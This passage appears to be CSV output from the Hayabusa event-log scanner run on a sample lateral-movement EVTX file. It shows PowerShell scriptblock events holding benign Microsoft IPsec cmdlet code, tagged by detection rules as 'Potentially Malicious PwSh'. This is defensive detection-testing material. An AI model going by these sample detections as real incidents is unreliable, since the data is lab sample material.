[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,", [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 
'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 
'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'NewP",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,", [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] 
${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) 
$__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if 